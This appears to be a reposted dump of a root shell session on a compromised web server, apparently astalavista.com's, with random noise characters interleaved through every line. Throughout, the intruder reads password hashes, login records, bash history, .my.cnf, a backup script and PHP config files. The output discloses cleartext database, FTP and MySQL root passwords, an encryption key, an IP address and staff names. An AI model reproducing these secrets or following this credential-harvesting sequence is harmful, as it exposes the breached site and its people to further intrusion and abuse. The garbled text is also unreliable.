; b, H( v% Y, w5 K& q4 fcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::$ _) g3 v+ i& w8 ^! {7 W7 ^
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::* v8 K# d# M$ t; h! s4 W$ K
& ~1 n" K' I# _6 j: s7 U5 R5 k' Vsh-3.2# cat /etc/motd1 _" v$ T* j; ]9 ]. G
#####################################################* Q a6 P: v2 o2 u: r) m
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #% ?% Z& {8 y5 p6 f3 N8 y
# |__| [__ | |__| | |__| | | | [__ | |__| #) `* y1 K' v T, y0 `5 J7 m6 H
# | | ___] | | | |___ | | \/ | ___] | | | #
1 w1 [" A2 r3 c4 \# #
% `+ ~, F% v9 M0 _+ q#####################################################
% z2 J/ q) `, i( {0 K3 E8 {# #0 \4 Z; m) B- d: g( `' v: o
# Admin Contact - 链接标记support@secureservertech.com #) T( F0 a* ?- N3 C1 [# L9 t2 x. V
# #
# g6 }$ `" u8 C' c# Available ShortCuts #% l; c9 a, b, Q, ~
# #4 `; E* h8 a: ]3 y8 U
# nst - list active connections #
- i- w6 a% c4 U3 K2 U, U# ddos - shows how many times each ip is connected #5 Y. v/ e- G! e! Y- ?+ I
# ltr - restart the webserver # i7 S' o l& o5 x0 B# z
# phpc - edit the php config file #
: c3 i) U8 w' W* c4 `# htc - edit the webserver configuration file #: p2 `9 b- B; G# M) E' ?6 w
# up - uptime #
. F" Z' X7 h( |& T: f% @# etd - edit the motd of the day file # F3 p0 x& z2 {! Y2 _6 @
# htr - start and restart apache if needed #
; Z9 a$ _% s: X/ C/ h: o2 ^1 U# syng - shows active SYN_RECV connections # k& t4 Y( \6 `% g
# synd - syn flood blocker - “synd -h” for usage #
j: B" r0 U9 v& ~& e#####################################################: `) N. S' v2 B# A+ O
# NOTES: #0 X$ p# L/ T+ M: Y' W, p
# Last Upgrade - 12-08-2008 by JF #% ]6 s8 T& j4 B6 a6 O
# My.cnf/Mysql Optimization - 1-28-09 #* k# s d( |. c
# #
' o* z3 a1 O9 A* @4 r- i# #4 t% [, v! P# s# R+ b% ], M) k
# #
4 |$ d& x! C: ], k o#####################################################
. h1 p* A* f' s7 Z6 a& [0 P# f5 X- b
sh-3.2# lastlog | grep -v Never. R/ I7 O" c+ B6 t6 L$ Q
Username Port From Latest
" } @. P5 U0 `# rroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
( O. u3 g# ~2 n/ m. ?; cadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008. {- t# w7 E9 O
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20092 ?$ n; }. X' U( d0 r8 R
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009. }4 M$ Y$ Z9 G9 R: r
& I# ^4 x+ t/ m+ t" E$ Q& C+ p) nsh-3.2# ls -la" n4 w9 o# ~6 X& Q% a3 S+ M A Q$ }
total 453376
3 Q: K+ w- v9 k5 F% M7 sdrwxr-x— 15 root root 4096 Jun 4 08:40 .( ?/ f+ X6 x- ]3 ?1 h" \9 r$ i2 W/ x
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 E! N5 }, C# n5 \
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip% R4 w8 b, x9 X0 w- b* J; ~9 s, N
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
5 S/ u- t" a% B-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
8 J" r. G+ O# G+ J9 p. I* W @-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
# \+ f& L0 i+ P-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile; Y5 R, @) _3 R7 w2 |& B
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
5 A( G- q' ~) _9 ^3 y-rwx—— 1 root root 1899 Oct 28 2007 bk.sh, _( X( _( i! c( k! @. k9 U
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
% J' G4 Q/ ^ x-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql1 I! H: ~/ T+ b9 ~+ R$ [* P
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan8 U$ e$ T" h: J6 r) E# l \, p
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
/ Q! ?5 S3 J# ?-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
3 k6 U7 L' O& tdrwx—— 2 root root 4096 Oct 28 2007 .elinks0 l {+ B {! a4 @ _, e9 v) d
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
$ G# e8 c" a0 u-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
2 ?2 Y0 Z4 ?4 A-rw——- 1 root root 0 Apr 16 13:19 .history
9 C9 J! p# A# @7 X# B! |% A' K, i, f-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
4 l2 E L V6 }) m, X/ V! d-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
) X) M# W* o( r1 t. i9 K-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh' S, ~1 f& p8 B- _" U1 n' e! B+ S: {; X
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
% w/ A7 H! K1 I1 z; z# mdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
$ A5 V7 o5 c: ]. Kdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec. @. H* \& D" p' z3 w
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz4 \" o1 l; C5 {) h3 G: p
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz27 s$ r) _' r: c, d& V
-rwx—— 1 root root 760 Sep 18 2008 lp
, z3 o, Q# P: D& E" U' Qdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1 [) v* T" F/ T
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
$ @$ E7 A7 W) q% |4 q-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1. O1 d/ i# }6 c7 N ~% Y# x8 A( k
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
\8 R* Y; z, |7 I, {# N0 A-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
4 r# A( w4 s- \2 k% e: T2 w$ F8 kdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3: R# G" w2 n1 P6 b" S P* r
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
& y$ b' J, Y. Q) o-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh% q, U% z6 b F: D/ k* m& W
-rw——- 1 root root 41 Oct 19 2007 .my.cnf8 G$ n( {# e& q
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history/ K3 G" p+ r# A [; j/ l+ R1 t! l
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
' H$ z. Q8 J, N" ^5 A. H# @* O-rw——- 1 root root 41 May 20 2008 .mytop
: _0 m3 Z+ u1 R+ t# Ldrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
# }3 f9 M' o* r* g% q) v-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz2 ^! o, [+ s- f0 }: k o1 `/ t
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp3 @( J4 C7 N: R4 b6 a
-rw——- 1 root root 1462 Sep 21 2007 opt.php
, ?0 [ s8 }. R: Q( ]2 z3 M-rw-r–r– 1 root root 3371 Sep 22 2007 p! k' q$ B5 a3 h+ ]
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
) y1 ~) c @: G, J-rw——- 1 root root 1024 Feb 3 21:32 .rnd
& ?0 y1 y3 V7 U, h, C$ j; ^# m3 N-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
/ d+ Q0 V% h ?) i-rw-r–r– 1 root root 887 Nov 28 2007 server.key
# j9 d0 l7 h5 L: N- |: Ndrwx—— 2 root root 4096 Oct 10 2008 .ssh% {+ I# h' ^! o
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat2 D% {+ d2 r+ o1 p, j. r" J- ^
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc5 ?6 H+ Z6 k3 y$ _8 N/ \3 X
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
7 E0 j' y+ }; }8 K, t, Y3 G-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
8 I5 o5 `' I% r$ T6 @. E: Sdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp) y( X8 j' K9 n# W/ G; H
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
_" Q* Q6 y8 }6 [: b+ s0 F! B, Gdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
1 A6 x4 z6 J; a( ?% V c-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2% G$ F9 U9 w' Q- g+ b# t
-rw——- 1 root root 12997 May 16 2008 .viminfo
$ {: _$ {5 Y v, R. ^3 k
R4 J' ~- D: ssh-3.2# cat .bash_history3 X/ O; ?1 M- i
[snip]
9 q; b5 _4 g. l: i: Ywget cp4sst.com/sstlinux.tar.gz; |' X t4 f" t/ S% F1 h* x
tar zxvf sstlinux.tar.gz
. ]3 d6 V+ u' h- j" x4 ~cd linux-2.6.27.10# @0 a4 W+ T+ v4 }: }+ U7 w
sh install.sh
2 |* k( g4 A- y3 Amake bzImage ; make modules ; make modules_install ; make install+ A) ]$ X6 T8 {& t; |: R
make clean
3 _7 S; Y0 C0 H) A% N. X. f! F, _/ ^service mysqld restart c0 k! R9 F( v6 S$ m. V
[snip]
' t. o, F( r w9 l& p& Fcd /usr/sbin/
% ~* Z" m9 {4 \chmod 4777 traceroute: j; ]' e. J. f6 y3 P
chmod 4777 ping# p/ N" {; G8 e+ i( l: i3 n2 R, ]
traceroute -I 链接标记[url]www.astalavista.ch[/url]
8 X+ o7 D" Q3 }4 v; ^+ Z[snip]# R9 J5 J# C7 M3 \# J1 X5 @
vi /etc/csf/csf.conf
- d8 C. O* @+ w$ d6 F" |traceroute google.ch0 b) C0 i o1 l+ `/ @8 @
service csf restart
1 ~' {2 }. W3 L( n4 j! C$ ] {0 ttracert google.ch
& c8 _' A; y& ^" [, s2 X' pservice csf restart0 c- b$ N2 W. T2 A) i
traceroute 链接标记[url]www.google.ch[/url]
$ v: {- K; p( O& a; G& Q' Y9 \tracert 链接标记[url]www.google.ch[/url]
* U, T" u7 m+ [ m* btraceroute 链接标记[url]www.google.ch[/url]& p, t1 J. {* d) y; X
locate traceroute
' i5 g* N* B4 w5 ~ s! ^3 Rchown 4755 /bin/traceroute- @$ o' e( d, Q* c
chown 4777 /bin/traceroute5 ?( l% F/ m5 b+ C5 r; k4 i
locate ping
% t2 F4 k+ D c& c$ ichown 4755 /bin/ping9 X D% U/ x1 n9 `( Q! u; ~
chown 4777 /bin/ping
) Z$ l) _8 n3 x+ Wcd /bin/) w$ g8 s) y5 J( r8 N1 S- w
ls -ali | grep ping
% @# h/ T! d% d* R3 Qchown root ping3 h8 Z& { }2 e
chmod 4755 ping: N. g- u1 p8 M" r) Q4 Q# J9 W
ls -ali | grep traceroute
8 K* g1 e1 i3 y" x6 ?2 u6 Ichown root traceroute
% z j: ?- W0 @' h1 j$ ichmod 4755 traceroute* a6 R7 e: V6 x+ [% E+ @
ls -ali | grep traceroute
) a; [0 o& Y1 Ytraceroute -I 链接标记[url]www.google.ch[/url]
6 @) X* P# n2 o0 u' r5 @traceroute 链接标记[url]www.google.ch[/url]% L! b9 J0 Z9 U: S) Z
whois pmsantos.ch
* {) t% G5 W4 h) w8 y _1 Y[snip]
5 n* f, u: @& z3 ~# kmysql -h com_contrexx2_live < /root/defaultp_ports.sql
- c! |" j( }( V% a$ @/ m% m; Kmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql, N. @! ]' X7 A: {
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
! }9 b# T& y0 S( bmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
: F* X" t# S" E( I8 H5 m" htop
5 ~, ]+ h+ D# y' { T2 yping ssth.ch
9 F- c7 t& [2 {+ Bping asdlkfaljgasd???ljg???lasj.ch3 k& ?5 p& P, q7 y& j
ping asdlkfaljgasdlasj.ch
" u3 |! M0 V$ @6 V7 Yping 链接标记[url]www.ssth.ch[/url]- r( [0 V% n$ p: O
ping ssth.ch; t" |8 h; n; K. `# t( H3 X
nslookup 链接标记[url]www.google.ch[/url]
) D; H5 V/ {5 x5 k) k6 enslookup 链接标记[url]www.ssth.ch[/url]
: x) ~9 e5 x1 o4 a1 i; o- `man nslookup
- v$ A1 ]8 u/ z% ?& q7 `7 \ping 链接标记[url]www.google.ch[/url]8 M, Z: S- Y$ v! m
nslookup 链接标记[url]www.google.ch[/url]7 `) L$ ^0 U' ~
nslookup 链接标记[url]www.google.ch[/url]
4 t9 ]! Q5 i6 t/ G$ _" Jnslookup salfjasdlf.ch" O$ f/ k7 g; k+ Y/ H0 m' J
[snip]+ Z7 Y9 ~9 ~7 ^" r$ V# \
openssl passwd -1 sadf+ ]% Y$ V! S& x
openssl passwd -1 5cZNHstdTy
2 R* n7 ?3 e5 B' p0 rmysql
, s. ^! N1 `6 }. T j) @0 nmysql' L/ _4 O% N+ U: c. v; O. n
locate proftp& ~& p( s& Q2 n
vi /etc/proftpd.passwd/ k) o, q N# Z& ^, j
service proftpd restart# P! N: f) P4 j* A
locate proftpd.conf
. q/ U+ Q; r1 f. Z. Rvi /etc/proftpd.conf
- s2 U# e% N$ zvi /etc/proftpd.passwd
# l+ ]3 c9 B7 q) A3 @- K2 vservice proftpd restart
$ \8 }, x2 s: p) C7 a3 X) W[snip]0 v3 B }: \0 {) m/ ]
/bin/sh /home/com/backup_system/backup.sh1 `6 I4 d1 j7 C% c- }+ f" o) K8 v
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin9 J+ ^8 ~, D4 r4 A% ^ g
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql! B) I* Y9 s0 a# c: D8 n2 B
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql3 g! M8 u: ^$ w8 U/ x2 ~
ls -ali
! L# M7 i; ?9 `/ y+ l' vmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql# O4 M" I; K9 @8 B" C: [! F2 E% R! V
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
$ m/ }" R B h; M& U8 ?6 J" Jcrontab -l& S4 l% D8 R8 {& Q/ Q3 V: F
crontab -l- @7 z9 t" H. g- e+ d$ Q7 N9 o
php -q /home/com/public_html/modifications/cronjobs/securitynews.php: o. l# ?2 ?* |+ x, ]
/home/com/public_html/modifications/cronjobs/exploits.sh
$ I8 j: `* l& t2 v! d& Vwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
" o `7 L1 j* ]! g; K4 n `8 Ttar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
; `" f" [% R2 d; L4 P8 S) V% lcd lsws-4.0.3
1 s0 k# _" |5 V1 S: u" L0 ~; R8 Gsh install.sh: ?6 E* W/ C3 a7 T9 N# o) f
uptime- e2 W6 R' Q- N. g6 T/ h
hdparm -tt /dev/sda
: T% O' s" M L- W3 ^iostat
; s. l% v2 h4 D1 m( Z/ i3 gyum install iostat* Q3 ?' e3 T6 j( @6 k" s
iostat* z0 Q. ?1 r: I# ]* s
whereis iostat
# a5 P+ k4 L3 Z, K- s/ F& myjm clean all9 D7 E& x$ Q( @0 N1 R" G
yum clean all ; yum -y update. d2 E, \! I( v3 J( h6 D
iostat
$ w0 M! E( l, L: T. ?+ `yum install systat
0 M9 Z1 J8 [! B+ a" R7 _rpm -qa | grep iostat1 m! w4 s; Z5 C4 D
rpm -qa | grep sysstat
' @, i0 ?+ w5 y4 _2 v' qrpm -qa | grep systat
$ g) d8 e* ]) x' Gdmesg -c; T) L$ K/ |0 l- ]( }0 }
sysctl -p# w6 |% B& y4 U: r! s& Q
uname -r* ~5 G! i4 }. T+ p' w
cd /usr/src) `1 q- k1 W: R
wget nix101.com/kernels/sstlinux.tar.gz
5 G4 x8 D: q9 M+ s1 M/ lshutdown -r now
: t: K2 A3 e( j5 c. X$ N% M( Xnano -w /boot/grub/grub.conf. o2 E* Y7 C; b# X
" d0 L; Y: H) C( t% w
sh-3.2# cat .my.cnf
3 K7 ^; p7 q! G/ v5 Q[client]% y) U9 o" ~. n$ O
user=da_admin
' n; e/ {0 A Bpassword=X9dctmRH" f9 @8 N. c/ y
6 s7 q' }. r: Q' }0 Q! y" csh-3.2# cat /home/com/backup_system/backup.sh
. a3 s: P+ @2 i; R r#!/bin/sh
* F# W- T. e8 k#####################################################################
& Y' g2 L: j& \1 d7 p# #" H& g7 N' P: L+ V; P5 y
# incremental backup for astalavista.com #! I, x* W6 `2 D# P% T+ t
# #
* E/ Z& j7 c" v4 O! k# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #; r' I3 k# D1 A$ `) x
# #7 _" m7 u4 m! o( Z! L( _% ~
#####################################################################
* h0 Y: @+ z; R9 E[snip]
; b& x# V7 a6 T8 o* J' Z3 \PROG_DIR=”/home/com/backup_system”;
' u, b. ^" I3 B3 ?: y9 wBACKUP_DIR=”/home/com/backups”;2 z4 L) p# ]" P' s* {
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
6 P `; B+ H- m5 ?( \0 ]( X4 t# ftp for synology backup server
; J/ i' \2 F; ~! k O. IFTP_HOST=”212.254.194.163″;
- M8 @3 p% \( X( T" r/ TFTP_PORT=”21″;- r& Z, p: M. H6 P1 k7 b
FTP_USER=”astalavista.com”;
$ i8 I0 `/ V& Q2 ZFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
: A; H- `! Y x7 ?FTP_DIR=”/astalavista.com”;6 Z* |6 z! q: _7 _: P
# database
( V- f" J5 |& u9 TDB_HOST=”localhost”;2 E5 U8 E: R" s% J
DB_USER=”contrexxuser2″;
1 x7 V0 w3 R* v0 `3 |7 G7 P- BDB_PASS=”0fEYNZgXz1pKe”;
, V' v) k; n/ z3 _* A4 j' ~/ l( `- }) gDB_DATABASE1=”com_contrexx2_live”;
; A9 _- R ?1 p7 t/ D7 KDB_DATABASE2=”com_contrexx2″;
. A5 }- P! z3 P& A* |* r[snip]9 d3 b: _4 E3 D6 h9 w. g5 d
ftp -in $FTP_HOST $FTP_PORT <<EOF
$ O4 F: \& P& N7 Q5 K7 n: Yquote USER $FTP_USER% Z& ^1 d& H, ?) h+ |9 U; F& N
quote PASS $FTP_PASS7 }" K# b. U/ M/ H0 g0 n
cd $FTP_DIR, F4 r. d9 Z w' ~
put $DB_FULLNAME-SQL_Dump.tar9 x4 {" i. S) W. a5 ^. U/ n" \
put $BACKUP_FULLNAME-Public_HTML.tar
& s9 N0 Q; e1 ~close! J3 j3 X i8 t1 x. g" C
bye/ O, l- r2 E, `& @1 _
EOF2 ]1 }% |2 K" ^8 o0 c% t" }
6 g5 D% |) D. u; n7 D+ G: U
sh-3.2# cd /home+ f/ ~9 }0 L- e% w/ Q
sh-3.2# ls -la
, s Y, ~! ]1 I& V% E4 C% V$ stotal 1200 X, Y* ^. W' |2 ]* l& k5 P6 a
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
N- L5 @& h! u7 \. c j" {drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..1 B. j4 q4 ^/ [5 j4 i
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
# `; o1 }1 c3 S; @9 r6 ~! n-rw——- 1 root root 8192 Jun 4 03:03 aquota.group" Q/ l* q, u3 \# @
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user f' v1 `( x9 Z, ^
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet% J' T% s) L$ m1 n) I& q* m0 V
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
1 |; T. L0 O- f, \* N2 _1 ]3 Rdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161# C1 ~9 A6 R, Q" t* b
drwx–x–x 10 com com 4096 Apr 28 12:40 com
) ^; S2 \4 C* A; Z% m5 X1 f# Ldrwxr-xr-x 2 root root 4096 May 17 2007 ftp
1 I( \+ o5 E& N: v! _7 Udrwx—— 3 jon jon 4096 Sep 21 2007 jon/ c$ j3 D7 i; M
drwx—— 2 root root 16384 Sep 11 2007 lost+found
9 }5 C7 F X8 \; sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 H" j; {' W" Y! ydrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
9 x! U- ]& S1 K2 H& S; s+ [* ddrwx—— 2 jon jon 4096 Sep 15 2007 test
- ^: Z+ m( V' c$ B, idrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
/ X: \+ m1 }2 J, R9 B7 c% L6 _7 x( w8 X7 b% W/ `: I% A7 ~$ F; h
sh-3.2# cd admin* z$ L0 t/ h _8 M4 L0 m3 m! c- v
sh-3.2# ls -la
9 k4 A# l y/ M# L4 utotal 1735896
! E" h2 K; c1 i! ]drwx–x–x 9 admin admin 4096 Nov 28 2007 .
7 W5 }5 {4 a/ F; edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ _5 \+ i9 r/ \2 x7 C1 ~drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
- E9 U c( L9 jdrwx—— 2 admin admin 4096 Sep 28 2007 backups7 |& `# K9 V3 I+ T0 W6 l# E$ X2 d* R
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
$ E: n$ }* ], B9 C; N) f: |8 X/ x' A9 W# f-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
% t: n6 {5 S+ j+ k7 U! r9 ^-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
& v, z7 j h4 J2 f) | I; v-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
7 |+ q& d* g1 g" ^& T6 Tdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups6 ?) R, Z. N$ t* o1 ^
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
2 u. _! S- S0 {, odrwxrwx— 3 admin mail 4096 Sep 21 2007 imap5 ^1 u+ q# W' |( e a7 w2 {
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
2 W7 u1 l* B! P4 b6 J: ?drwx—— 2 admin admin 4096 Sep 21 2007 mail* _- T: x! j, X. [
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* R9 ^9 C2 M4 Z$ H5 ^8 N-rw-r–r– 1 root root 887 Nov 28 2007 server.key. |- a5 ^# H/ B3 b; ~
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
7 f3 g; a" g7 K" ^) q; ^, F' v; N1 u4 Q-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz* V# H. A! j2 [( c
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
- B4 Y" v" r9 b% Q8 x. `6 F
7 q9 `# i3 @/ m& ~$ {sh-3.2# ..2 P3 P. k+ G/ c; L
sh-3.2# cd jon: ^4 Y0 T @' @" {' H N
sh-3.2# ls -la
; t4 @$ z. Z2 ]total 36
0 j$ [$ ?! V' G$ u! K0 Y8 L7 Cdrwx—— 3 jon jon 4096 Sep 21 2007 .3 j. R9 j2 a; [; v. @4 u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ {5 T S* j9 J0 D-rw——- 1 jon jon 53 Sep 21 2007 .bash_history+ d" G# X3 i: F
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout% j& B1 D9 F. n3 z
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile8 @3 ~" b3 m5 J( ^" J
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
9 d$ e5 w! ~. Y3 ?-rw-r–r– 1 root root 24 Sep 21 2007 info.php, _/ l2 K" `" n: R1 e P
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html. u$ J$ _. u5 C# i" A* s
" i4 i: i F( [3 S2 [% J
sh-3.2# cd ..
. [# n& K0 S( Vsh-3.2# cd test
* n* ?9 w6 x1 {& O4 e" Msh-3.2# ls -la/ p$ { X* O7 y5 q2 S! F1 ?
total 486 @+ [3 y, c7 ?* w1 H
drwx—— 2 jon jon 4096 Sep 15 2007 .
' |. |% I) v0 x' f0 j7 R \drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 ~8 H' E! H% ~8 ^2 i) U7 u- t-rw——- 1 jon jon 79 Sep 21 2007 .bash_history+ ^& f3 J' d0 k; C' K
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout, l# ?, j9 Y/ G3 [
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile ^" }' ~6 A: l/ F; i
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
0 _% j% ^( Q/ \5 w, K& ash-3.2# cat .bash_history
' t6 o& ~+ X- [) w6 ?/usr/bin/mysqladmin -u root password PoliuJhytg67
( B6 e% e) r. V8 A, u! i) L! G0 H+ v9 P7 R6 h W
sh-3.2# cd ..
+ Z" c+ t; R- `1 [8 ^3 \sh-3.2# cd astanet
5 R$ q+ |$ ~9 {+ ksh-3.2# ls -la2 X! E: E" {& ]( t# p& e% z8 ^. \
total 52! j4 s' P0 j" C7 P' c" }& A
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .$ F) O0 x: m/ {4 G+ P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: q9 ~) R: J1 X3 }: X
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& x" `: v$ {7 i, y& Y0 s8 k
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
1 z: [% b& p0 T6 `. ?-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
# i2 }6 U% U: z9 V* D$ J-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
H6 I) b! Z& C- c+ P: U/ J( X# o: g-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
+ R L2 J- m( ?& |: Wdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
4 K! n- A* I* M3 Idrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap! E# ]( g3 b4 x. D u* e* i2 K, `
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail9 {* |; T! {: `1 B
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
5 s9 O, B- q+ C8 _/ c. blrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
' E' Q# E. {( t7 ^ m& y-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow& g& D; m# B! h4 A9 A# m% E& y9 L
. |0 t" E! G9 N$ {& l; v0 h+ D) C
sh-3.2# cd auth/6 Q0 a* Y8 Z5 Y3 D# C8 F: m0 E' {
sh-3.2# ls -la7 A% _0 {0 U. {
total 281 K; A" B% N& F" w$ k# A
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
3 }- A D2 Z3 X/ o- y' Ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..& f2 s- K1 d2 R9 F" U2 E' {* D
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
! I9 t$ b2 d! [& A8 F7 {/ d0 ^-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
% n/ G# j( }! p/ H2 y-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
$ T! s1 K* v3 H) D+ l" J-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
m- a3 H, h2 i7 S-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd+ _* t6 r2 J7 w9 c/ T5 }" x' q
* H4 {, U% Q$ s+ N, Psh-3.2# cat hackercontest.config.inc.php3 t7 W9 H3 S \9 r7 A7 _$ |% A
<?PHP
- @# \0 ^ Y2 d! O L# d// Variabeln f?r Verbindung zur Datenbank //. D3 p* o A0 s5 P) ~9 [# m
$conxHost = ‘localhost’; // MySQL hostname
* f; f0 V' Z& K m# p, y$conxUser = ‘hackercontest’; // MySQL user
j+ w- ?# ~$ m( ]6 K& l* A* Z$conxPassword = ‘K6m@7dUc’; // MySQL password
4 s/ _- i! G. l2 W, s3 h& E p$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
4 m% O: T% Z0 [! q% X# q4 d, B?>
$ z. H C i1 U1 P7 P) \1 k0 ^sh-3.2# cat hosting.config.inc.php
/ H; y* \: }9 Q/ K% u1 Q- j8 r<?PHP
9 t& M6 Q3 Z6 r- H* d// Variabeln f?r Verbindung zur Datenbank //
/ f9 q' B! ^( T$conxHost = ‘localhost’; // MySQL hostname
